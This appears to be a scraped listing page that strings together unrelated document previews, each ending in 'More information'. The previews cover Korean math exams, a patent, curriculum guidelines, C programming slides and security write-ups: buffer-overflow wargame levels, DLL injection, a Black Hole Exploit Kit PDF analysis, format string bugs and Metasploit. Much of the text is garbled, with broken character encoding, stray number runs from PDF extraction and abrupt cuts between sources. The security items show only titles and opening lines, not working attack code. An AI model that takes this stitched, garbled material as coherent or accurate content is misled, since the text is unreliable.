°ø±â¾Ð±â±â 20, 30, 40 20, 30, 40 1 2 3 4 5 6 7 8 9 10 3.1 6.3 9.4 12.6 15.7 18.8 22.0 25.1 28.3 31.4 2.4 4.7 7.1 9.4 11.8 14.1 16.5 18.8 21.2 23.6 7.1 14.1 21.2 28.3 35.3 42.4 49.5 56.5 63.6 70.7 5.9 11.9 17.8 23.7

More information

*통신1510_01-도비라및목차1~12

*통신1510_01-도비라및목차1~12 ISSN 5-693 15. 11 15. 11 1 13 1 15. 1.5..3.1.6 3.9 -.8 -.3.9 1. 1.6.1 1. 1.7 1.6 -.1-1.1 1.3.5-1. 7.7 7.7 7.3 7. 7. 7. 7. 8 6 8 6 i 3 1-1 3 1-1 5 5 3 3 1 1 ii 1 8 5 3.5 3.5 3. 3..5.5.. 1.5 1.5

More information

MPLAB C18 C

MPLAB C18 C MPLAB C18 C MPLAB C18 MPLAB C18 C MPLAB C18 C #define START, c:\mcc18 errorlevel{0 1} char isascii(char ch); list[list_optioin,list_option] OK, Cancel , MPLAB IDE User s Guide MPLAB C18 C

More information

슬라이드 1

슬라이드 1 악성코드유포에홗용되는 난독화기법분석 이민섭 NBP 포털서비스보앆팀 c 2011 NHN CORPORATION 목차 1. 악성코드유포및감염 2. 최근웹사이트공격동향 3. 난독화공격코드 3.1 난독화에대한정의 3.2 공격코드의난독화주요방법 3.3 난독화공격코드사례 4. 악성코드바이너리의특징과목적 5. 결롞 1. 악성코드유포및감염 1. 악성코드유포및감염 이메일첨부파일을이용한악성코드유포

More information

Level 4 ( hell_fire -> evil_wizard ) ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard

Level 4 ( hell_fire -> evil_wizard ) ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard Level 4 ( hell_fire -> evil_wizard ) [hell_fire@fedora_1stfloor ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard - Local BOF on Fedora Core 3 - hint : GOT overwriting

More information

Microsoft Word - PE Infection ? How to Inject a dll.doc

Microsoft Word - PE Infection ? How to Inject a dll.doc Black- out Frenzy [ B] (F) Security Researcher Center B0Frenzy.freehostia.com PE Infection How to Inject a dll www.mihanit.net Thank you to my friends who help me in this research (K053,Heli, L U C I F

More information

미통기-3-06~07(052~071)

미통기-3-06~07(052~071) 06 F() f() F'()=f()F() f() : f()d f() f() f() f() F()f() F()+C : f()d=f()+c C F'()=f(): f()d=f()+c C d [: f()d]=f() d : k d=k+c k C : «d= + +C =0C + : k f()d=k: f()d k : { f() g()}d=: f()d : g()d =f()

More information

많이 이용하는 라면,햄버그,과자,탄산음료등은 무서운 병을 유발하고 비만의 원인 식품 이다. 8,등겨에 흘려 보낸 영양을 되 찾을 수 있다. 도정과정에서 등겨에 흘려 보낸 영양 많은 쌀눈과 쌀껍질의 영양을 등겨를 물에 우러나게하여 장시간 물에 담가 두어 영양을 되 찾는다

많이 이용하는 라면,햄버그,과자,탄산음료등은 무서운 병을 유발하고 비만의 원인 식품 이다. 8,등겨에 흘려 보낸 영양을 되 찾을 수 있다. 도정과정에서 등겨에 흘려 보낸 영양 많은 쌀눈과 쌀껍질의 영양을 등겨를 물에 우러나게하여 장시간 물에 담가 두어 영양을 되 찾는다 (51) Int. Cl. (19) 대한민국특허청(KR) (12) 공개실용신안공보(U) A23L 1/307 (2006.01) C02F 1/68 (2006.01) (21) 출원번호 20-2011-0002850 (22) 출원일자 2011년04월05일 심사청구일자 2011년04월05일 (11) 공개번호 20-2011-0004312 (43) 공개일자 2011년05월03일

More information

<BCF620C3CAB5EE20362D3220B1D7B8B028326E64292DC7D0BBFDBFEB2DBCF6C1A42E706466>

<BCF620C3CAB5EE20362D3220B1D7B8B028326E64292DC7D0BBFDBFEB2DBCF6C1A42E706466> D A S U I N A C A D E M Y Green 2nd 4 1 Green DASUIN ACADEMY STORY TELLING 3 % 14 35 12 3 8 2 6 15 4 1 35 % 3 % 2 % 15 % DASUIN ACADEMY 1 18 8 1 4 4 18 8 _1=45 (% _1=2 (% 4 4 1 4 _1=25 (% _1=1 (% 4 4 1

More information

<B1E2BCFAB9AEBCAD5FB9DABAB4B1D45F F F64746F72732E687770>

<B1E2BCFAB9AEBCAD5FB9DABAB4B1D45F F F64746F72732E687770> 기술문서 09. 11. 3. 작성 Format String Bug 에서 dtors 우회 작성자 : 영남대학교 @Xpert 박병규 preex@ynu.ac.kr 1. 요약... 2 2. d to r 이란... 3 3. 포맷스트링... 4 4. ro o t 권한획득... 7 5. 참고자료... 1 0-1 - 1. 요약 포맷스트링버그 (Format String bug)

More information

Black Hole Exploit Kit PDF Exploit $selectedexploit =? 3 or 4 /games/pdf.php /games/pdf2.php CVE , CVE , CVE , CVE

Black Hole Exploit Kit PDF Exploit $selectedexploit =? 3 or 4 /games/pdf.php /games/pdf2.php CVE , CVE , CVE , CVE Black Hole Exploit Kit 1.0.2 PDF Exploit Analysis SOFTFORUM Security Analysis Team 1 Black Hole Exploit Kit PDF Exploit $selectedexploit =? 3 or 4 /games/pdf.php /games/pdf2.php CVE-2007-5659, CVE-2008-2992,

More information

C 프로그래밍 언어 입문 C 프로그래밍 언어 입문 김명호저 숭실대학교 출판국 머리말..... C, C++, Java, Fortran, Python, Ruby,.. C. C 1972. 40 C.. C. 1999 C99. C99. C. C. C., kmh ssu.ac.kr.. ,. 2013 12 Contents 1장 프로그래밍 시작 1.1 C 10 1.2 12

More information

수리 영역 가 형 5. 다음 그림과 같이 크기가 같은 정육면체 개가 한 모서리씩을 공유하 면서 각 면이 평행 또는 수직 관계를 유지한 채로 한 평면 위에 놓여있 다. 그림의 세 꼭짓점 A, B, C에 대한 두 벡터 BA 와 BC 가 이루는 각 의 크기를 h라 할 때,

수리 영역 가 형 5. 다음 그림과 같이 크기가 같은 정육면체 개가 한 모서리씩을 공유하 면서 각 면이 평행 또는 수직 관계를 유지한 채로 한 평면 위에 놓여있 다. 그림의 세 꼭짓점 A, B, C에 대한 두 벡터 BA 와 BC 가 이루는 각 의 크기를 h라 할 때, 제``교시 수리 영역( 가 형) 시간:00분 점수:00점 성명 수험 번호 쭚 반드시 본인이 선택한 유형( 가 형 또는 나 형)의 문제인지 확인하시오. 쭚 문제지와 답안지에 성명과 수험 번호를 정확히 기입하시오. 쭚 MR 답안지에 성명, 수험 번호, 응시 유형 및 선택 과목, 답 등을 표기할 때에는 반드시 수험생이 지켜야 할 사항 에 따라 표기하시오. 쭚 문항에

More information

A y y y y y # 2#

A y y y y y # 2# 0. 9 A 0 0. 0-0.5748 0 0.454545 04 0.4 05 0.5 06 0.4 07-0.555 08 0.9666 09 5@ 5@ 00 0.5 0 5 5 5@ 5 # # 7 0.07 0.5 0.55 4 0.5 5 0.06 6 7 8 \ 9 \ 0 \ 0.^ 40-.4^0^ 4 50.^5^ 5 55.0^5^ 6 0.4^857^4857 7 0.^8^8

More information

/* */

/* */ /*---------------------------------------------------------------------------------*/ 번역 : innovation@wowhacker.org /*---------------------------------------------------------------------------------*/

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 1. data-addressing mode CHAPTER 6 Addressing Modes 2. use of data-address mode to form assembly language statements 3. op of program memory address mode 4. use of program memory address mode to form assembly

More information

Microsoft PowerPoint - chap01-C언어개요.pptx

Microsoft PowerPoint - chap01-C언어개요.pptx #include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 프로그래밍의 기본 개념을

More information

1020041200.hwp

1020041200.hwp 20 2004-7-1 21 22 2004-7-1 23 B M B P C B C C C C C Co M B P M B P B FC P B: C: M: P: C C FC C M FC : Co : :, 2004. 24 2004-7-1 25 1999 2000 2001 2002 26 2004-7-1 27 28 2004-7-1 29 30 2004-7-1 31 32 2004-7-1

More information

초보자를 위한 C# 21일 완성

초보자를 위한 C# 21일 완성 C# 21., 21 C#., 2 ~ 3 21. 2 ~ 3 21.,. 1~ 2 (, ), C#.,,.,., 21..,.,,, 3. A..,,.,.. Q&A.. 24 C#,.NET.,.,.,. Visual C# Visual Studio.NET,..,. CD., www. TeachYour sel f CSharp. com., ( )., C#.. C# 1, 1. WEEK

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Development Environment 2 Jo, Heeseung make make Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one It

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 DEVELOPMENT ENVIRONMENT 2 MAKE Jo, Heeseung MAKE Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one 2

More information

Microsoft PowerPoint - 기계공학실험1-1MATLAB_개요2D.pptx

Microsoft PowerPoint - 기계공학실험1-1MATLAB_개요2D.pptx 1. MATLAB 개요와 활용 기계공학실험 I 2013년 2학기 MATLAB 시작하기 이장의내용 MATLAB의여러창(window)들의 특성과 목적 기술 스칼라의 산술연산 및 기본 수학함수의 사용. 스칼라 변수들(할당 연산자)의 정의 및 변수들의 사용 방법 스크립트(script) 파일에 대한 소개와 간단한 MATLAB 프로그램의 작성, 저장 및 실행 MATLAB의특징

More information

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg 익스플로잇실습 / 튜토리얼 Eureka Mail Client 2.2q Omelet Egg Hunting By WraithOfGhost Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python 2.7.10 - Ollydbg

More information

480제 생물Ⅰ 해설

480제 생물Ⅰ 해설 001~023 001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 01 001 정답찾아가기 B 3L/100kg A 2L/100kg B A 1.5 오답피하기 A B 002 정답찾아가기 A B A B B A 27æ 003 정답찾아가기 D D D 오답피하기

More information

<근대이전> ⑴ 문명의 형성과 고조선의 성립 역사 학습의 목적, 선사 문화의 발전에서 국가 형성까지를 다룬다. 역사가 현재 우리의 삶과 긴밀하게 연결되었음을 인식하고, 역사적 상상력을 바탕으 로 선사 시대의 삶을 유추해 본다. 세계 여러 지역에서 국가가 형성되고 문 명

<근대이전> ⑴ 문명의 형성과 고조선의 성립 역사 학습의 목적, 선사 문화의 발전에서 국가 형성까지를 다룬다. 역사가 현재 우리의 삶과 긴밀하게 연결되었음을 인식하고, 역사적 상상력을 바탕으 로 선사 시대의 삶을 유추해 본다. 세계 여러 지역에서 국가가 형성되고 문 명 2009년 개정 교육과정에 따른 교과 교육과정 적용을 위한 중학교 역사 교과서 집필 기준 ⑴ 문명의 형성과 고조선의 성립 역사 학습의 목적, 선사 문화의 발전에서 국가 형성까지를 다룬다. 역사가 현재 우리의 삶과 긴밀하게 연결되었음을 인식하고, 역사적 상상력을 바탕으 로 선사 시대의 삶을 유추해 본다. 세계 여러 지역에서 국가가 형성되고 문 명이

More information

Press Arbitration Commission 62

Press Arbitration Commission 62 제 2 부 언론관련판결 사례 제1장 명예훼손 사례 제2장 재산권 침해 사례 제3장 기타 인격권 침해 사례 제4장 형사 사례 제5장 헌법재판소 결정 사례 편집자 주 - 사건관계인의 인격권을 보호하기 위해 필요한 경우 사건관계인의 이름, 소속회사, 주 소, 차량번호 등을 비실명 익명처리하고 필요한 경우 최소한의 범위내에서 판결문의 일부를 수정 또는 삭제함을 알려드립니다.

More information

I 0 ( C) 80 35 0 30 60 90 0 0 0 03 _ fi 64 ;3!; (5 ' ) ' a>0b>0 a a =a + a a =a - (a ) =a (ab) =a b log 4 log ;4!; a>0a+ N>0 a =N HjjK =logån 3 f()=3+ f:x Y Y =f() X f 3 4 5 0 4 8 = =a a>0 a= =a (a>0a+)

More information

=

= written by vangelis(vangelis@wowhacker.org) 0 0000 8 1000 1 0001 9 1001 2 0010 10 1010 3 0011 11 1011 4 0100 12 1100 5 0101 13 1101 6 0110 14 1110 7 0111 15 1111 110112 + 100012 = 1011002 110 0000 0101

More information

AD AD 8-0 / A A-2 / A A A-5 / A A T-T / Q

AD AD 8-0 / A A-2 / A A A-5 / A A T-T / Q 8-0 / 1-00... 002 A-1..... 003 A-2 / A-3....... 004 A-4..... 007 A-5 / A-6..... 012 A-8..... 016 T-T / Q-7... 017 1 8-0 1986-1991 20-5083-A5 RH 20-5084-A5 LH 893941030 893941029 HE LAMP B TYPE 18-5143-05

More information

특허청구의 범위 청구항 1 횡방향으로 서로 이웃하는 제1 PC 패널과 제2 PC 패널이 횡방향으로 서로 접합되어 구축되는 건축구조물의 구조 벽체로서, 제1 PC 패널의 길이방향으로 하부측에는, 횡방향 측면이 상부측에서의 횡방향 측면보다 횡방향으로 더 돌출되어 있는 하부

특허청구의 범위 청구항 1 횡방향으로 서로 이웃하는 제1 PC 패널과 제2 PC 패널이 횡방향으로 서로 접합되어 구축되는 건축구조물의 구조 벽체로서, 제1 PC 패널의 길이방향으로 하부측에는, 횡방향 측면이 상부측에서의 횡방향 측면보다 횡방향으로 더 돌출되어 있는 하부 (19) 대한민국특허청(KR) (12) 등록특허공보(B1) (51) 국제특허분류(Int. Cl.) E04B 2/56 (2006.01) E04B 2/72 (2006.01) (21) 출원번호 10-2011-0008594 (22) 출원일자 2011년01월28일 심사청구일자 2011년01월28일 (65) 공개번호 10-2012-0087418 (43) 공개일자 2012년08월07일

More information

Microsoft PowerPoint - 00_(C_Programming)_(Korean)_Computer_Systems

Microsoft PowerPoint - 00_(C_Programming)_(Korean)_Computer_Systems C Programming 컴퓨터시스템 (Computer Systems) Seo, Doo-Ok Clickseo.com clickseo@gmail.com 목 차 컴퓨터시스템 프로그래밍언어 2 컴퓨터시스템 컴퓨터시스템 컴퓨터하드웨어 컴퓨터소프트웨어 프로그래밍언어 3 컴퓨터시스템 컴퓨터시스템 하드웨어 : 물리적인장비 소프트웨어 : 프로그램 ( 명령어 ) 들의집합 Computer

More information

풍문으로들었소팀보고서 hkpco, hellsonic, lokihardt, gogil 페이지 1 / 16

풍문으로들었소팀보고서 hkpco, hellsonic, lokihardt, gogil 페이지 1 / 16 풍문으로들었소팀보고서 hkpco, hellsonic, lokihardt, gogil 페이지 1 / 16 S1_Hello_kiki: 100 hello_kiki.pcap 파일이문제로주어집니다. 와이어샤크로열어서쭉쭉내리다보면 RTP 프로토콜이맋은데, 스태틱스 -> VoIP Calls 에들어가 서재생을해보면대화를들을수있고, 패스키는자싞의로그인패스워드라고합니다. 페이지

More information

0 cm (++x)=0 x= R QR Q =R =Q = cm =Q =-=(cm) =R =x cm (x+) = +(x+) x= x= (cm) =+=0 (cm) =+=8 (cm) + =0+_8= (cm) cm + = + = _= (cm) 7+x= x= +y= y=8,, Q

0 cm (++x)=0 x= R QR Q =R =Q = cm =Q =-=(cm) =R =x cm (x+) = +(x+) x= x= (cm) =+=0 (cm) =+=8 (cm) + =0+_8= (cm) cm + = + = _= (cm) 7+x= x= +y= y=8,, Q . 09~ cm 7 0 8 9 8'-p 0 cm x=, y=8 cm 0' 7 cm 8 cm 9 'åcm 90 'åcm T T=90 T T =" 8 - =' (cm) T= T= _T _T _'_ T=8' (cm ) 7 = == =80 -_ =0 = = _=(cm) M = = _0= (cm) M M =" - = (cm) r cm rcm (r-)cm H 8cm cm

More information

Microsoft PowerPoint - a6.ppt [호환 모드]

Microsoft PowerPoint - a6.ppt [호환 모드] 이장의내용 6 장조건부처리 부울과비교명령어 조건부점프 조건부루프명령어 조건부구조 컴퓨터정보통신 어셈블리언어 2 6.2 부울과비교명령어 부울명령어 Instructions ti 동작 AND dst, src OR dst, src XOR dst, src NOT dst dst dst AND src dst dst OR src dst dst XOR src dst NOT

More information

(004~011)적통-Ⅰ-01

(004~011)적통-Ⅰ-01 0 f() F'()=f() F() f(), : f() F'()=f(): f()=f()+c C 4 d d : [ f()]=f()+c C [: f()]=f() «`` n C : n = n+ +C n+- : =ln +C n+ f() g() : kf()=k: f() k : { f()+g()}=: f()+: g() : { f()-g()}=: f()-: g() 5 C

More information

제20회_해킹방지워크샵_(이재석)

제20회_해킹방지워크샵_(이재석) IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!

More information

2005년 6월 고1 전국연합학력평가

2005년 6월 고1 전국연합학력평가 제 1 교시 2015학년도 9월 모평 대비 EBS 리허설 2차 국어 영역(B형) 김철회의 1등급에 이르게 해 주는 [보기] 활용 문제 미니 모의고사(문학편) 1 유형편 [1]다음 글을 읽고 물음에 답하시오. 1. 를 참고하여 (가)를 이해할 때, 적절하지 않은 것은? (가) 머리는 이미 오래 전에 잘렸다 / 전깃줄에 닿지 않도록 올해는 팔다리까지 잘려

More information

본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasplo

본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasplo 본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasploit Framework(MSF) 이란? bluearth in N@R 2003년오픈소스로발표된취약점발견및공격을위한

More information

ThisJava ..

ThisJava .. 자바언어에정확한타입을추가한 ThisJava 소개 나현익, 류석영 프로그래밍언어연구실 KAIST 2014 년 1 월 14 일 나현익, 류석영 자바언어에정확한타입을추가한 ThisJava 소개 1/29 APLAS 2013 나현익, 류석영 자바 언어에 정확한 타입을 추가한 ThisJava 소개 2/29 실제로부딪힌문제 자바스크립트프로그램분석을위한요약도메인 나현익,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 @ Lesson 2... ( ). ( ). @ vs. logic data method variable behavior attribute method field Flow (Type), ( ) member @ () : C program Method A ( ) Method B ( ) Method C () program : Java, C++, C# data @ Program

More information

<4E505F415AB1DBB7CEB9FABAF1C1EEC7C3B7A35FBEE0B0FC28303630343031292E687770>

<4E505F415AB1DBB7CEB9FABAF1C1EEC7C3B7A35FBEE0B0FC28303630343031292E687770> 무배당 알리안츠글로벌비즈플랜보험 약관 제1관 보험계약의 성립과 유지 제1조 보험계약의 성립 제2조 청약의 철회 제3조 약관교부 및 설명의무 등 제4조 계약의 무효 제5조 계약내용의 변경 제6조 보험대상자(피보험자)의 변경 제7조 계약의 갱신 제8조 계약자의 임의해지 제9조 계약의 소멸 제10조 보험나이 제2관 보험료의 납입(계약자의 주된 의무) 제11조 제1회

More information

< D312D3220C0CCB5EEBAAFBBEFB0A2C7FC E485750>

< D312D3220C0CCB5EEBAAFBBEFB0A2C7FC E485750> 다음 1)1) 2)2) 다음 가 3) 3) 4) 4) 나 다 5) 5) 라 6) 6) 다음 7) 7) 8) 8) 다음 1. zb 다음그림과같이 AB = AC인 ABC 에서 BC = BD 이고, BDC = 65 일때, DAB - ABD 의크기는? AB = AD 1 BC = DC 2 ( 다 ) 3 1, 2, 3으로부터대응변의길이가같으므로 ABC ( 라 ) BAC

More information

1.기본현황 연 혁 m 본면은 신라시대 ~고려시대 상주목에 속한 장천부곡 지역 m 1895.5.26한말에 이르러 장천면(76개 리동),외동면(18개 리동)으로 관할 m 1914.3.1행정구역 개편으로 상주군 장천면과 외동면이 병합하여 상주군 낙동면 (17개 리,25개

1.기본현황 연 혁 m 본면은 신라시대 ~고려시대 상주목에 속한 장천부곡 지역 m 1895.5.26한말에 이르러 장천면(76개 리동),외동면(18개 리동)으로 관할 m 1914.3.1행정구역 개편으로 상주군 장천면과 외동면이 병합하여 상주군 낙동면 (17개 리,25개 목 차 1.읍면동 기본현황 2.지방세 징수현황 3.소규모 주민숙원사업비 집행현황 4.예산 집행현황 5.예산 미집행 현황 6.고액체납자 현황 및 징수(독려)현황 7.관외체납세 징수(독려)현황 8.특수시책 확인자 낙 동 면 장 김 진 숙 (인) 부 면 장 차 정 식 (인) 주 민 생 활 지 원 담 당 김 영 욱 (인) 민 원 담 당 전 용 희 (인) 산 업 담

More information

Check 0-9, 9,, - 6, 6, 6, =0.04, (-0.) = , =64 8 8, -8 (-6) =6 (-6) 6, -6 7, , -0. 8, -8 6, '7 ' '

Check 0-9, 9,, - 6, 6, 6, =0.04, (-0.) = , =64 8 8, -8 (-6) =6 (-6) 6, -6 7, , -0. 8, -8 6, '7 ' ' 0 06 0 4 4 9 4 8 5 40 45 5 57 Check 0-9, 9,, - 6, 6, 6, -6 0-0. =0.04, (-0.) =0.04 0.04 0., -0. 8 =64 8 8, -8 (-6) =6 (-6) 6, -6 7, -7 0. 0., -0. 8, -8 6, -6 0-7 7 '7 ' 0.5 0.5 -' 0.5 ;!; ;!; æ;!; '7 '

More information

Microsoft Word - KSR2012A038.doc

Microsoft Word - KSR2012A038.doc YWXY º º t rzyywxyhwz_ º zƒ A Study on the Relation of Railroad System and Energy Saving ö ä ø ã ä ãã In Moon, Han-Min Lee *, Jong-Eun Ha * * Abstract Now the world, such as the impact of fossil energy

More information

C 프로그래밊 개요

C 프로그래밊 개요 구조체 2009 년 5 월 19 일 김경중 강의계획수정 일자계획 Quiz 실습보강 5 월 19 일 ( 화 ) 구조체 Quiz ( 함수 ) 5 월 21 일 ( 목 ) 구조체저녁 6 시 5 월 26 일 ( 화 ) 포인터 5 월 28 일 ( 목 ) 특강 (12:00-1:30) 6 월 2 일 ( 화 ) 포인터 Quiz ( 구조체 ) 저녁 6 시 6 월 4 일 ( 목

More information

歯7장.PDF

歯7장.PDF 7 Hello!! C 2 . 3 ([] ) < > [ ]; int array[10]; < > [ ][ ]; int array [3] [5]; 4 < > [ ]={ x1,,x10} ( ); (,). ({}). : int array[10]={1,2,3,4,5,6,7,8,9,10}; (" "). : char array[7]="turbo-c"; 5 int array[2][3]={{1,2},{3,4},{5,6}};

More information

1 1 x + # 0 x - 6 x 0 # x # 2r sin2x- sin x = 4cos x r 3 r 2r 5 r 3r

1 1 x + # 0 x - 6 x 0 # x # 2r sin2x- sin x = 4cos x r 3 r 2r 5 r 3r # 0 0 # # si si cos # 0 # 0 ^ h ^h^h# 0 ^! 0, h ^h^h# 0 ^! 0, h si si cos sicos si cos si ^cos h ^cos h si ^cosh^cos h 0 ^sih^cos h 0 0 # # cos cos, ^ si! h,, ` 0 # 혼자하는수능수학 0 년대비 9 월 A B, y f^h f^h, 0

More information

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환 취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer

More information

untitled

untitled int i = 10; char c = 69; float f = 12.3; int i = 10; char c = 69; float f = 12.3; printf("i : %u\n", &i); // i printf("c : %u\n", &c); // c printf("f : %u\n", &f); // f return 0; i : 1245024 c : 1245015

More information

chap7.PDF

chap7.PDF 7 Hello!! C 2 . 3 ([] ) < > [ ]; int array[10]; < > [ ][ ]; int array [3] [5]; 4 < > [ ]={ x1,,x10} ( ); (,). ({}). : int array[10]={1,2,3,4,5,6,7,8,9,10}; (" "). : char array[7]="turbo-c"; 5 int array[2][3]={{1,2},{3,4},{5,6}};

More information

(1) 주소지정방식 Address Mode 메모리접근 분기주소 명령어 직접번지 Reg. 지정 Reg. 간접 Base Index 간접 Immediate 상대번지 절대번지 Long 주소 Reg. 간접 Byte Access Bit Access 내부 Data M

(1) 주소지정방식 Address Mode 메모리접근 분기주소 명령어 직접번지 Reg. 지정 Reg. 간접 Base Index 간접 Immediate 상대번지 절대번지 Long 주소 Reg. 간접 Byte Access Bit Access 내부 Data M (1) 주소지정방식 Address Mode 메모리접근 분기주소 2. 8051 명령어 직접번지 Reg. 지정 Reg. 간접 Base Index 간접 Immediate 상대번지 절대번지 Long 주소 Reg. 간접 Byte Access Bit Access 내부 Data Memory 외부 Data Memory (2) 명령어세트 - 8051 명령어는 5 가지로분류,

More information